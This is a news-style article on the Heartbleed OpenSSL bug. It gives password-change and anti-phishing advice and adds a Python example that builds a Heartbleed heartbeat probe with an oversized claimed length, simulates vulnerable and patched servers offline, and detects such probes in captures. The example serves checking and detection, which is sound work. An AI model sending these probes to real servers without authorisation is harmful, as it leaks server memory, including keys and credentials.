As news of the Heartbleed bug in OpenSSL and its implications trickles down into mainstream media, users are trying to figure out which passwords to change and which software to update.
To help with this, SANS keeps a list of vendors who have already issued updates or have noted that they weren’t vulnerable in the first place and, as far as I can tell, Mashable has the most thorough list of Internet services and their current status regarding bug mitigation activities and notes on whether users should proceed to change their passwords on their accounts.
If you are a Facebook, Tumblr, Google, Gmail, Yahoo, Yahoo Mail, AWS, GoDaddy, Intuit, Dropbox, LastPass, OKCupid, SoundCloud, or Wunderlist user, go change your password immediately, and make it a good one (long, complex and unique). This would also be a good time to start considering the use of a password vault tool or service.
Services that claim not to have been affected include LinkedIn, Amazon, Microsoft, AOL, Hotmail/Outlook, PayPal, Target, a variety of big US banks, Evernote, and several more. Still, if you’re not the type to change your passwords often, it might be a good idea – while you’re at it – to change them for these accounts now as well.
If you are not sure whether an online service has fixed the hole, you can always check via one of several online checkers for the Heartbleed bug. Bear in mind that a full fix means more than installing the patched OpenSSL: because the bug can leak the server's private key, the service should also have reissued its certificate and revoked the old one. Changing your password before a service has done that cleaning up is pointless, since a new password sent to a still-vulnerable server can be leaked just like the old one – wait until they do.
Some services will notify you directly of the changes, and will urge you to change your passwords. But beware! The current situation will surely be exploited by phishers looking to impersonate legitimate services and trick users into sharing their login credentials.
If you receive such an email (whether it is legitimate or a phishing attempt), avoid clicking on links contained within, and change your password by accessing your account via the official login page, reached by following a bookmark or by entering the URL in the browser's address bar yourself.
Check with your bank whether they have fixed the problem on their online banking website before accessing it again, and check your bank account and payment card statements regularly for fraudulent transactions.
The chances that random attackers have been misusing the bug to steal information so far are extremely small, but according to Kaspersky Lab researchers, since the revelation of its existence, state-sponsored hacker groups have begun running automated scans to search for Internet-facing servers using OpenSSL.
Unfortunately, as we already know, the attack leaves no trace in ordinary server logs: the malicious heartbeat is handled inside OpenSSL before the application ever sees a request, so unless a site kept full packet captures it is impossible to tell which (if any) servers have been compromised.
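To make concrete what the online checkers mentioned above actually send and what they look for, and what the only available trace of an attack looks like on the wire, here is an added example (my own code, not that of the article, OpenSSL, or any of the checkers). It assumes the RFC 6520 heartbeat layout (type, 2-byte payload length, payload, at least 16 bytes of padding) inside a TLS 1.1 record, and stands in a constructed `server_reply` function for the real peer so that it runs offline: the unpatched branch copies as many bytes as the request claims, the patched branch applies the length check that the OpenSSL fix added and silently drops the message.

```python
"""Heartbleed record inspection: the probe a checker sends, the reply it
judges, and the on-the-wire pattern a packet-capture or IDS check can flag.
Added example, not code from the article or from any checker it mentions.
Assumes TLS 1.1 record framing and the RFC 6520 heartbeat message layout:
type (1 byte) | payload_length (2 bytes) | payload | padding (>= 16 bytes)."""
import struct

HEARTBEAT, ALERT = 24, 21        # TLS record content types
HB_REQUEST, HB_RESPONSE = 1, 2   # heartbeat message types (RFC 6520)
MIN_PADDING = 16                 # RFC 6520 minimum padding
TLS_VERSION = (3, 2)             # TLS 1.1 version bytes; an assumption here


def build_heartbeat(payload: bytes, claimed_length: int, hb_type: int = HB_REQUEST) -> bytes:
    """Build one heartbeat record.  claimed_length is the length field the peer
    trusts; a Heartbleed probe sets it far above len(payload).  Keep it at or
    below 0x4000 so a vulnerable peer's reply still fits in one record."""
    body = struct.pack("!BH", hb_type, claimed_length) + payload + b"\x00" * MIN_PADDING
    return struct.pack("!BBBH", HEARTBEAT, *TLS_VERSION, len(body)) + body


def iter_records(data: bytes):
    """Yield (content_type, body) for each complete TLS record; stop at a
    truncated one so a partial capture is never misread."""
    off = 0
    while off + 5 <= len(data):
        ctype, _major, _minor, length = struct.unpack("!BBBH", data[off:off + 5])
        body = data[off + 5:off + 5 + length]
        if len(body) < length:
            break
        yield ctype, body
        off += 5 + length


def malformed_heartbeats(data: bytes) -> list:
    """Detection side: flag heartbeat records whose claimed payload length
    cannot fit inside the record.  Returns (label, claimed, room) tuples,
    where room is the most payload the record could actually carry."""
    findings = []
    for ctype, body in iter_records(data):
        if ctype != HEARTBEAT or len(body) < 3:
            continue
        hb_type, claimed = struct.unpack("!BH", body[:3])
        room = len(body) - 3 - MIN_PADDING
        if claimed > room:
            label = "heartbleed probe" if hb_type == HB_REQUEST else "oversized heartbeat response"
            findings.append((label, claimed, max(room, 0)))
    return findings


def server_reply(probe: bytes, patched: bool) -> bytes:
    """Constructed stand-in for the peer.  Unpatched OpenSSL copied
    claimed_length bytes starting at the request payload, running past the
    end of the request into whatever followed it in memory; the fix compares
    the claimed length with the record length and silently discards."""
    replies = b""
    for ctype, body in iter_records(probe):
        if ctype != HEARTBEAT or len(body) < 3:
            continue
        hb_type, claimed = struct.unpack("!BH", body[:3])
        if hb_type != HB_REQUEST:
            continue
        if patched and 1 + 2 + claimed + MIN_PADDING > len(body):
            continue                                  # patched: drop, reply with nothing
        real = body[3:3 + claimed]
        fake_memory = b"M" * (claimed - len(real))    # constructed: bytes past the request
        replies += build_heartbeat(real + fake_memory, claimed, HB_RESPONSE)
    return replies


def classify_response(sent_payload: bytes, response: bytes) -> tuple:
    """Checker side: judge the reply to a probe.  Returns (verdict, leaked_bytes)."""
    for ctype, body in iter_records(response):
        if ctype == ALERT:
            return ("not vulnerable: alert", 0)
        if ctype == HEARTBEAT and len(body) >= 3 and body[0] == HB_RESPONSE:
            leaked = len(body) - 3 - MIN_PADDING - len(sent_payload)
            if leaked > 0:
                return ("VULNERABLE", leaked)
            return ("not vulnerable: honest echo", 0)
    return ("not vulnerable: no heartbeat response", 0)


if __name__ == "__main__":
    probe = build_heartbeat(b"", 0x4000)              # the classic checker probe
    print(malformed_heartbeats(probe))
    print(classify_response(b"", server_reply(probe, patched=False)))
    print(classify_response(b"", server_reply(probe, patched=True)))
```

Two things worth noticing: a patched server that still has the heartbeat extension enabled answers a probe with nothing at all rather than an alert, so a checker must treat silence as "not vulnerable" while still distinguishing it from a server that never negotiated heartbeats; and the detection logic only ever fires on the request, which is why it helps solely on sites that kept packet captures, and explains why the application logs the article mentions show nothing.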
It’s also difficult (if not impossible) to tell for sure whether intelligence agencies around the world – and especially the NSA – knew about this bug and exploited it. Wired’s Kim Zetter has penned a good article about the likelihood of that, and Ars Technica’s Sean Gallagher has some details about the attack possibilities and effective potential of the exploitation of the bug.
Finally, we can be sure that the repercussions of this discovery will reverberate for a while, as SANS faculty member Jake Williams has demonstrated that vulnerable client-side OpenSSL implementations – in software on smartphones, computers, routers, etc. – can be targeted using malicious servers.